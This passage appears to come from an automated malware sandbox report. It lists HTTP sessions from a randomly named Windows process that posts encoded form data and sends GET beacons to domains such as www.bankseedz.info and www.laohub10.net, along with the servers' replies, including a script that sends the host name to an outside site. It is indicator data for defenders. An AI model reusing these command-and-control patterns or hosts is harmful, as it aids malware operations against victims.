    Data Ascii: bV=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXU8aJGUwxIJg4UjEQyHb1ib3EVoTlH8loRjLAajbJ158L+0TOnt+OMYlkYosjCWrytEyFdnh4zXCHKLUsYhNH1uqoyHkxqfh/ABZJZXOu2l6ZNH/RbCZ3P1j5AYZnIVmqkxUyR477CPcI9GBdAQauVzwDQOns5rMqcYmUqG32RUcZEUkB+HH
Dec 2, 2024 15:24:30.245717049 CET | 532 | IN | HTTP/1.1 200 OK
    Server: Apache
    Content-Type: text/html; charset=utf-8
    Accept-Ranges: bytes
    Cache-Control: max-age=86400
    Age: 1
    Connection: Close
    Content-Length: 357
    Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49875 | 202.79.161.151 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:31.683051109 CET | 1796 | OUT | POST /n2c9/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1239
    Connection: close
    Host: www.laohub10.net
    Origin: http://www.laohub10.net
    Referer: http://www.laohub10.net/n2c9/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 36 7a 58 62 63 4e 54 37 53 75 33 38 59 75 75 58 72 67 58 73 52 6d 73 6c 30 4b 73 2b 4d 52 63 58 63 35 6f 68 4d 4f 65 57 58 55 6b 61 4a 31 63 77 7a 70 4a 67 35 55 6a 45 61 53 48 61 31 69 62 36 45 56 67 58 6c 48 78 48 6f 54 62 4c 43 38 33 62 4d 41 56 38 42 2b 30 54 43 48 74 2f 42 73 59 77 6b 59 5a 72 6a 43 47 72 79 74 45 79 46 59 72 68 38 69 58 43 46 4b 4c 54 38 49 68 42 44 31 75 4f 6f 79 66 4f 78 71 62 78 2f 7a 4a 5a 49 34 37 4f 6f 41 52 36 47 39 48 39 51 62 43 42 33 50 70 47 35 47 39 33 6e 4d 64 59 71 6e 68 55 79 58 51 67 38 67 47 45 56 76 61 62 50 68 55 70 35 44 6a 31 49 67 2b 45 67 65 50 50 72 73 4d 33 58 76 48 77 36 77 52 62 41 42 41 70 49 4a 36 4b 53 6b 42 56 53 4a 66 57 46 78 39 36 6d 49 6e 68 75 4f 43 70 66 66 51 32 70 5a 33 45 46 52 69 73 74 45 61 4b 6a 4e 48 66 2b 71 74 72 6c 79 4b 34 4a 73 52 35 4c 4d 70 72 37 6a 47 67 55 7a 53 2f 4f 70 79 58 52 56 58 41 66 6f 4d 39 48 6b 4e 70 68 54 37 2f 51 6a 51 44 6e 52 71 6c 54 7a 45 35 59 6e 74 56 6c 77 71 52 59 65 64 6f 59 46 68 39 41 49 73 [TRUNCATED]
Data Ascii: bV=6zXbcNT7Su38YuuXrgXsRmsl0Ks+MRcXc5ohMOeWXUkaJ1cwzpJg5UjEaSHa1ib6EVgXlHxHoTbLC83bMAV8B+0TCHt/BsYwkYZrjCGrytEyFYrh8iXCFKLT8IhBD1uOoyfOxqbx/zJZI47OoAR6G9H9QbCB3PpG5G93nMdYqnhUyXQg8gGEVvabPhUp5Dj1Ig+EgePPrsM3XvHw6wRbABApIJ6KSkBVSJfWFx96mInhuOCpffQ2pZ3EFRistEaKjNHf+qtrlyK4JsR5LMpr7jGgUzS/OpyXRVXAfoM9HkNphT7/QjQDnRqlTzE5YntVlwqRYedoYFh9AIs [TRUNCATED]
Dec 2, 2024 15:24:32.998274088 CET | 532 | IN | HTTP/1.1 200 OK
                                                                                                                  Server: Apache
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Cache-Control: max-age=86400
                                                                                                                  Age: 1
                                                                                                                  Connection: Close
                                                                                                                  Content-Length: 357
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49883 | 202.79.161.151 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:34.699871063 CET | 497 | OUT | GET /n2c9/?bV=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvpOFGl3CcQklZlekjGrp+0XQqfczBPHNrv5hMhkDFTE+A==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.laohub10.net
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 2, 2024 15:24:35.873297930 CET | 532 | IN | HTTP/1.1 200 OK
                                                                                                                  Server: Apache
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Cache-Control: max-age=86400
                                                                                                                  Age: 1
                                                                                                                  Connection: Close
                                                                                                                  Content-Length: 357
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49899 | 46.30.211.38 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:41.681350946 CET | 765 | OUT | POST /uf7y/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.bankseedz.info
                                                                                                                  Origin: http://www.bankseedz.info
                                                                                                                  Referer: http://www.bankseedz.info/uf7y/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 6f 72 59 56 50 2b 49 38 54 31 4a 78 35 76 6f 44 78 6d 33 75 6e 6c 48 68 4e 6b 4c 36 6b 74 57 76 55 37 76 64 74 4a 4c 70 41 45 45 32 6d 45 48 58 50 77 67 66 41 6f 4b 62 6a 2b 4e 69 61 61 36 72 75 45 4d 66 31 4f 38 7a 36 59 70 4c 6e 65 53 58 4f 45 4a 43 47 51 45 2b 35 6d 67 44 39 51 66 42 58 35 7a 32 46 32 33 69 76 4f 31 4e 79 5a 67 68 64 6d 33 49 71 59 41 52 6d 6f 34 52 34 44 30 6d 4b 32 57 36 37 65 56 46 4a 4f 47 34 64 4b 76 79 5a 36 35 6f 71 46 70 75 55 69 4f 52 44 53 31 45 6a 47 58 63 36 32 35 30 35 55 6b 54 61 76 56 44 49 57 55 58 74 30 4a 63 4d 65 73 3d
                                                                                                                  Data Ascii: bV=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65oqFpuUiORDS1EjGXc62505UkTavVDIWUXt0JcMes=
Dec 2, 2024 15:24:42.989131927 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49905 | 46.30.211.38 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:44.352227926 CET | 785 | OUT | POST /uf7y/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.bankseedz.info
                                                                                                                  Origin: http://www.bankseedz.info
                                                                                                                  Referer: http://www.bankseedz.info/uf7y/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 62 6d 76 55 62 66 64 73 49 4c 70 4f 6b 45 32 31 45 48 57 58 51 67 41 41 6f 50 6d 6a 2b 78 69 61 61 75 72 75 42 6f 66 31 39 55 77 72 59 70 4a 76 2b 53 56 4b 45 4a 43 47 51 45 2b 35 6d 6c 4c 39 51 48 42 58 49 44 32 58 45 66 6a 7a 65 31 4f 7a 5a 67 68 5a 6d 32 67 71 59 41 2f 6d 70 6b 33 34 46 77 6d 4b 7a 53 36 37 72 70 4b 65 65 47 45 5a 4b 75 57 55 61 45 4b 6b 48 31 62 53 67 4f 59 64 6a 68 59 6d 77 6d 32 67 55 78 63 71 30 49 72 4b 38 64 30 5a 6d 31 2b 33 58 5a 73 53 4a 34 37 39 4a 36 33 58 50 33 32 73 6d 42 59 2f 6c 59 74 4c 71 36 5a
                                                                                                                  Data Ascii: bV=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0IrK8d0Zm1+3XZsSJ479J63XP32smBY/lYtLq6Z
Dec 2, 2024 15:24:45.641560078 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49914 | 46.30.211.38 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:47.027004004 CET | 1802 | OUT | POST /uf7y/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.bankseedz.info
                                                                                                                  Origin: http://www.bankseedz.info
                                                                                                                  Referer: http://www.bankseedz.info/uf7y/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 61 2b 2f 52 37 67 33 38 73 65 78 6f 35 2b 49 56 63 4a 30 38 53 56 4a 79 32 50 6f 44 6d 32 33 31 6e 6c 37 68 4e 68 7a 55 6e 59 47 76 55 6f 6e 64 71 72 7a 70 4e 6b 45 32 32 45 48 54 58 51 67 4a 41 6f 32 74 6a 2b 38 41 61 5a 57 72 75 6e 30 66 6b 38 55 77 69 59 70 4a 6a 65 53 49 4f 45 4a 58 47 51 55 69 35 6c 4e 4c 39 51 48 42 58 4b 62 32 48 47 33 6a 78 65 31 4e 79 5a 67 6c 64 6d 32 62 71 59 59 4a 6d 70 78 4d 35 31 51 6d 4b 54 69 36 35 35 42 4b 64 2b 47 38 65 4b 75 4f 55 61 49 38 6b 48 70 68 53 68 37 46 64 6c 52 59 6e 55 33 48 33 55 77 48 33 69 51 75 49 39 39 55 49 57 6b 53 77 33 52 45 56 4f 51 69 30 5a 2b 6c 65 34 6a 6e 6d 46 67 58 71 6a 55 35 45 73 57 59 47 6c 5a 71 38 2f 2f 4b 69 77 4c 4a 79 45 68 4e 33 74 6e 66 36 68 61 56 35 69 6f 4f 45 44 42 72 2f 51 46 61 46 75 6c 41 42 58 37 6e 4e 31 44 69 68 4d 4a 59 4a 2f 68 4d 38 53 74 75 30 6c 31 58 4d 39 41 63 62 37 78 6c 56 71 4b 77 53 79 51 41 41 48 2b 55 47 46 47 56 77 47 6a 70 50 4c 4e 74 77 53 31 53 72 57 39 56 78 48 74 76 66 76 54 42 59 36 78 [TRUNCATED]
Data Ascii: bV=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnYGvUondqrzpNkE22EHTXQgJAo2tj+8AaZWrun0fk8UwiYpJjeSIOEJXGQUi5lNL9QHBXKb2HG3jxe1NyZgldm2bqYYJmpxM51QmKTi655BKd+G8eKuOUaI8kHphSh7FdlRYnU3H3UwH3iQuI99UIWkSw3REVOQi0Z+le4jnmFgXqjU5EsWYGlZq8//KiwLJyEhN3tnf6haV5ioOEDBr/QFaFulABX7nN1DihMJYJ/hM8Stu0l1XM9Acb7xlVqKwSyQAAH+UGFGVwGjpPLNtwS1SrW9VxHtvfvTBY6x [TRUNCATED]
Dec 2, 2024 15:24:48.311336040 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49920 | 46.30.211.38 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:49.683216095 CET | 499 | OUT | GET /uf7y/?bV=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7gow9os+aP1J4EzwTxXBX+A+Fa6CXCkfj46dm/6YpVTzCxw==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.bankseedz.info
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 2, 2024 15:24:50.989335060 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Mon, 02 Dec 2024 14:24:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 17 | Source IP: 192.168.2.5 | Source Port: 49936 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 728 | Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
